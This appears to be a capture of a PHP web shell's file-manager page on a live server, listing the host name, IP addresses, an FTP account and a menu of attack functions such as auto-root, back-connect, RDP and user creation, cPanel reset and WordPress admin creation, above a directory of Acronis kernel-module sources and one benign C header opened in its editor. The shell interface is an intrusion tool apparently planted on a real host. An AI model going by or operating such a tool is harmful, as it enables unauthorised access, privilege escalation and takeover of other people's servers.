Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1572 /
[ HOME SHELL ]
Name
Size
Permission
Action
common
[ DIR ]
drwxr-xr-x
ftrace_hooks
[ DIR ]
drwxr-xr-x
lsm_hooks
[ DIR ]
drwxr-xr-x
syscall_hooks
[ DIR ]
drwxr-xr-x
transport
[ DIR ]
drwxr-xr-x
Kbuild
10.29
KB
-rw-r--r--
Makefile
2.23
KB
-rw-r--r--
compat.c
8.38
KB
-rw-r--r--
compat.h
11.98
KB
-rw-r--r--
debug.h
3.56
KB
-rw-r--r--
dkms.conf
146
B
-rw-r--r--
file_contexts.c
52.97
KB
-rw-r--r--
file_contexts.h
2.86
KB
-rw-r--r--
file_contexts_priv.h
5.33
KB
-rw-r--r--
file_handle_tools.h
2.23
KB
-rw-r--r--
file_key_tools.h
950
B
-rw-r--r--
file_path_tools.h
2.09
KB
-rw-r--r--
hashtable_compat.h
2.73
KB
-rw-r--r--
hook_trampoline_common.h
4.29
KB
-rw-r--r--
interval_tree.h
779
B
-rw-r--r--
memory.c
3.31
KB
-rw-r--r--
memory.h
2.99
KB
-rw-r--r--
module.c
2.67
KB
-rw-r--r--
module_ref.h
421
B
-rw-r--r--
module_rundown_protection.c
3.64
KB
-rw-r--r--
module_rundown_protection.h
743
B
-rw-r--r--
path_tools.h
5.84
KB
-rw-r--r--
rundown_protection.c
4.2
KB
-rw-r--r--
rundown_protection.h
2.83
KB
-rw-r--r--
safe_kobject.h
1.28
KB
-rw-r--r--
si_common.h
4.23
KB
-rw-r--r--
si_fp_properties.h
858
B
-rw-r--r--
si_fp_properties_x.h
16.77
KB
-rw-r--r--
si_fp_value_types.h
515
B
-rw-r--r--
si_fp_value_types_x.h
1.25
KB
-rw-r--r--
si_size.h
4.15
KB
-rw-r--r--
si_templates.h
2.39
KB
-rw-r--r--
si_writer.h
6.93
KB
-rw-r--r--
si_writer_common.h
12.27
KB
-rw-r--r--
stringify.h
261
B
-rw-r--r--
task_info_map.c
14.61
KB
-rw-r--r--
task_info_map.h
6.33
KB
-rw-r--r--
task_info_map_common.h
4.15
KB
-rw-r--r--
task_tools.h
1.34
KB
-rw-r--r--
tracepoints.c
3.58
KB
-rw-r--r--
tracepoints.h
299
B
-rw-r--r--
write_protection.h
2.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : task_info_map_common.h
/** @file task_info_map_common.h @brief Header of task info map common functions @details Copyright (c) 2025 Acronis International GmbH @author Bruce Wang (bruce.wang@acronis.com) @since $Id: $ */ #pragma once #ifndef BPF_PROGRAM #include <linux/ktime.h> #include "task_info_map.h" #else #include "ebpf_programs.bpf.h" #include "file_key_tools.h" #endif static void task_info_set_pid_version(task_info_t *task_info, uint64_t pid_version, uint64_t artificial_start_time_us) { WRITE_ONCE(task_info->pid_version, pid_version); WRITE_ONCE(task_info->artificial_start_time_us, artificial_start_time_us); } static bool task_info_may_need_refresh(const task_info_t *task_info, const file_key_t *key) { file_key_t exe_file_key; exe_file_key.ptr = READ_ONCE(task_info->exe_file_key.ptr); exe_file_key.ino = READ_ONCE(task_info->exe_file_key.ino); exe_file_key.gen = READ_ONCE(task_info->exe_file_key.gen); exe_file_key.dev = READ_ONCE(task_info->exe_file_key.dev); return 0 != cmp_file_key(&exe_file_key, key); } #ifndef BPF_PROGRAM static task_info_map_t global_task_info_map; static void task_info_context_invalidate(transport_task_context_t *context); #endif static bool task_info_refresh(task_info_t *task_info, const struct path *exe_path, bool force_advance_pid_version) { file_key_t key; int i; if (!exe_path) return false; make_key(&key, exe_path); if (!force_advance_pid_version) { if (!task_info_may_need_refresh(task_info, &key)) return false; } #ifdef BPF_PROGRAM uint64_t boot_time = bpf_ktime_get_boot_ns() / 1000; #endif spin_lock(&task_info->spinlock); if (force_advance_pid_version || 0 != cmp_file_key(&key, &task_info->exe_file_key)) { // If 'exe_file_key.ptr==0', exe was not provided on creation. This means that we get to keep the same 'pid_version' // but 'exe_file_key' should be updated to the current 'exe'. Keep the normal logic for 'force_advance_pid_version'. if (force_advance_pid_version || 0 != task_info->exe_file_key.ptr) { #ifndef BPF_PROGRAM task_info_set_pid_version(task_info, atomic64_add_return(1, &global_task_info_map.next_pid_version), ktime_to_us(ktime_get_real())); for (i = 0; i < MAX_TRANSPORT_SIZE; i++) { transport_task_context_t *context = &task_info->contexts[i]; task_info_context_invalidate(context); } #else task_info_set_pid_version(task_info, __sync_fetch_and_add(&g_pid_version, 1), boot_time); #endif } WRITE_ONCE(task_info->exe_file_key.ptr, key.ptr); WRITE_ONCE(task_info->exe_file_key.ino, key.ino); WRITE_ONCE(task_info->exe_file_key.gen, key.gen); WRITE_ONCE(task_info->exe_file_key.dev, key.dev); } spin_unlock(&task_info->spinlock); return true; } #ifndef BPF_PROGRAM static void task_info_context_init(transport_task_context_t *context, transport_id_t id); static task_info_t *task_info_init(task_info_t *task_info, pid_t pid, uint64_t unique_pid, uint64_t pid_version, const struct path *exe_path, uint64_t start_time_us) #else static task_info_t *task_info_init(task_info_t *task_info, pid_t pid, uint64_t unique_pid, uint64_t pid_version, const struct path *exe_path, const file_key_t *key, uint64_t start_time_us) #endif { int i; #ifndef BPF_PROGRAM DPRINTF("task_info=%p pid=%i", task_info, pid); RB_CLEAR_NODE(&task_info->rb_node); task_info->pid = pid; atomic_set(&task_info->ref_cnt, 1); spin_lock_init(&task_info->spinlock); #endif task_info->pid = pid; task_info->unique_pid = unique_pid; task_info_set_pid_version(task_info, pid_version, start_time_us); if (exe_path) #ifndef BPF_PROGRAM make_key(&task_info->exe_file_key, exe_path); #else task_info->exe_file_key = *key; #endif else task_info->exe_file_key = (file_key_t){0}; #ifndef BPF_PROGRAM for (i = 0; i < MAX_TRANSPORT_SIZE; i++) { transport_id_t id = transport_id_make_not_taken(i); transport_task_context_t *context = &task_info->contexts[i]; task_info_context_init(context, id); } #endif return task_info; }
Close